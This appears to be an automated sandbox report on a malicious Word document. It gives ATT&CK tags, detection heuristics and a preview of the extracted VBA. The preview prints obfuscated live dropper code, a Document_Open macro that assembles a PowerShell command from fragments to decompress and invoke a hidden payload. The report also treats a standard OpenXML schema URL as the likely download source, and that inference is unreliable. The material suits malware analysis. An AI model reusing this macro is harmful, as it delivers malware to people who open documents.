MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' and the 'Document_Open' macro indicate that the VBA code is designed to execute arbitrary commands. The script attempts to construct and execute a PowerShell command, which is likely intended to download and execute a second-stage payload from the URL 'http://schemas.openxmlformats.org/drawingml/2006/main'. This indicates a dropper or downloader functionality.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6606412-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6606412-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15189 bytes | 8734c7c1f4a2430a761d101b8b4d69f8328037078c8fbffa3d12382bdd3a2322 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "zYpBmLZSiz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
fAaXV = 74472 - 27603 - 43447 * bqzSdN + mRjcGw - zlfszq / 58553 / opwYw
IISln = 73140 - 23247 - 90552 * UqXzc + EzYus - fCUGq / 795 / CJiMLK
XiRfj = 59489 - 232 - 6103 * ZwlZt + LDhWdl - tQfJPB / 15773 / EPuPt
QbFniJ = 21345 - 72464 - 47056 * TLQRH + QjnDqC - miPza / 89920 / JdwAL
rKAWAd = 30090 - 43685 - 62826 * YZPbE + nibNma - MTJavj / 96734 / YzUNuS
nuDIYC = 56982 - 31326 - 75186 * HrawN + nnNHSF - KkqKH / 80708 / PFVMd
cIQDwYM ("" + SzziRTBEESN + rcUlhlAzWPwus + twiIoSAmtbW + SjkUX + SAqWvsriURwwIN + OhbtXhrVaYH)
PskOT = 46556 - 1852 - 51687 * KwKiR + vjPWQ - VjEvz / 74261 / dpPtrp
NSbvs = 40093 - 25486 - 32115 * JaSBWs + rGBHq - vKqXkI / 39926 / XlpMGz
WciXJ = 29951 - 2239 - 50057 * KNFjt + qcDztI - STlMzj / 90696 / SsZwZ
End Sub
Attribute VB_Name = "wGpUJulljIjJ"
Function twiIoSAmtbW()
On Error Resume Next
IsBXqD = slBBcv + CIdCt * THbXTf - PEwcnD / oHSjmF * KNWLXj + 14533 - SOiOnI / 2310 + dDKVN + (77018 - ZNZFZu - zQouIu / MwwaZ)
BJoBL = rFqlpF + dwXOi * FrGIS - kiRvbz / vZVNb * acYKRE + 28456 - SzBGHq / 92988 + MvAWEa + (18866 - JPlVJA - iwaHp / hoDDGS)
tYQhnq = dcjaWY + zwbhvc * SasAH - RGLuo / HjoIX * DBToEU + 73383 - IPzWs / 55989 + PazXh + (62606 - XWQplU - QIpEw / bwiWYN)
MQFCZ = "pow" + TJXPMaNEjzSwA + tjRpSKhiH + "e" + GwSwIYJUvcz + hVrqHWijmlKZA + "rsh" + imaQRjTQmlrtof + vmdHwSrakPzUL + "e" + HcLqJChdHO + EQcuAfv + "ll " + XnBMuzjBhzEd + QdpznNJWtrNm + "&" + VwoQsmjp + OCBbZOAbsfL + "( " + iHBdBtKw + YjiKnkaAbSMil + "$" + wiqlufvEoGJr + vAiGNdvqEMqR + "E" + wwzWpvEOTNNJ + uDitRRjShcX + "n" + FadudALGpHnC + jjRtDATwAiz + "V" + EfRWwGIz + SkIRVEwrrEnzm + ":C" + UiTJZvzdoGaY + vFfrpwIuizrEq + "OMS" + YEtBndXoqOvUHU + jLCvzIHwQaZAWR + "Pe" + shPCjWz + QpdudBaXCL + "c" + JwQwwlNEXSYtr + FIOJOqXiTi + "["
YzcTFc = ilzFj + kHBzQk * AbVPn - iwmNz / uwoEv * TQcuoF + 5439 - YijVlC / 89377 + lwiMfD + (96165 - vXCnp - vDGwwT / GnPMJd)
mTbbQAmWV = "4" + cuXvMrZiS + KzQDPplij + "," + GbYfJPzWZzCi + PtaEdXfj + "15," + HWLzUsSiB + wXjhKiwqVIVVv + "2" + KiCrGZaIYnDCCj + cGUSVtWTo + "5]-" + fHmAQwYiojJiO + IuGjtKpos + "J" + haQHjDXkuAm + FiwrnSXGwGlcM + "O" + fpStlpPzRjzGL + PVHSaPMwBZr + "I" + TffWuhEEhsBw + jKpMLbUrPUu + "n''"
SrQUtU = ilAaMi + WhdGU * ifnMNj - RcQLbN / mNQYH * MCvKOA + 64956 - zJmNa / 93920 + nDEHNa + (24567 - VpzwW - IQEzpY / kdzNwq)
dzBQP = KLRtDz + ZVPBK * oshOk - KCZHt / ktisr * iGowEn + 10261 - YfLIhL / 75602 + iaviRr + (9906 - kEXiTG - jdSSD / qnuJzz)
buLIFK = ")( " + ahcIOIwJf + sNAPbTS + "N" + iOtjAnmAYUr + TdpCKrK + "E" + nbCidnfiih + mMosIaWwk + "w-O" + botXZZJaCtKbRh + zVqpKHqj + "bj" + JBQoojb + ujPFJVGPTbk + "E" + rQWauVoU + FYPHJOFbz + "c" + WajPjUDs + jizKARN + "t"
wJwsm = 86268 + 197 + ZDYjn / 13824 + qIEvv - pKdCbF
oGzWK = 62912 + 87428 + wBOAl / 65960 + UpnKN - kcaIY
lFcsz = " IO" + OllbQnEWNs + vlObZtd + "." + DdwZHwTpK + WCpnzMqTmmrDNp + "cOM" + OaBMasFLIn + okjCFmjt + "p" + iNCJwiMalkM + OIaViwi + "R" + KjfBGozb + cnvoJRu + "ES" + iBRzOjRtfRCwRv + ViwYXcJ + "s" + zQTUQDjV + IsjQVouSKFFKra + "io" + nzCbFrpmRPwZO + amwMKmNbk + "N." + zWFmYsic + TDrQCzwFpVDw + "deF" + XtNbBZVSzvs + iqGqmzjHiGwH + "LAT" + WuHHDkbPf + aqRAEwYj + "esT" + OjiQwFWpmR + KzXsnoiF + "R"
ckLGP = 13000 + 57438 + XXYuH / 22279 + qEiEZs - mNjRd
arlaUw = "EAM" + AKEDHuFrqQLd + oPsMPzkEBpSPzz + "( " + dRAoWOqDEikMoo + TpZQZRzLz + "[Io" + PlrwHRsm + FaaZoHjNXPN + ".M" + wIYKYMT + ZFaRMlcvwBUnN + "e" + rkJQzbjvnjvojH + amQAVwXuvkc + "mOR" + HOitYSnC + MsJnhRwtobbtA + "ySt" + isNPUNzNk + MvKojXXuEH + "Rea" + pdwqnrkN + fuZaniiNfZGM + "M]" + iAuDWGs + hXlWWLVzS + " [c" + PQOGkoQqcmE + wInwjrHtYc + "o" + BMHBJZn + mRloThpBifc + "Nv"
PJomtc = 70027 + 11620 + EzviQ / 70624 + EfLMSM - TPXWQ
ZOYZT = 52410 + 186 + rnVDic /
... (truncated)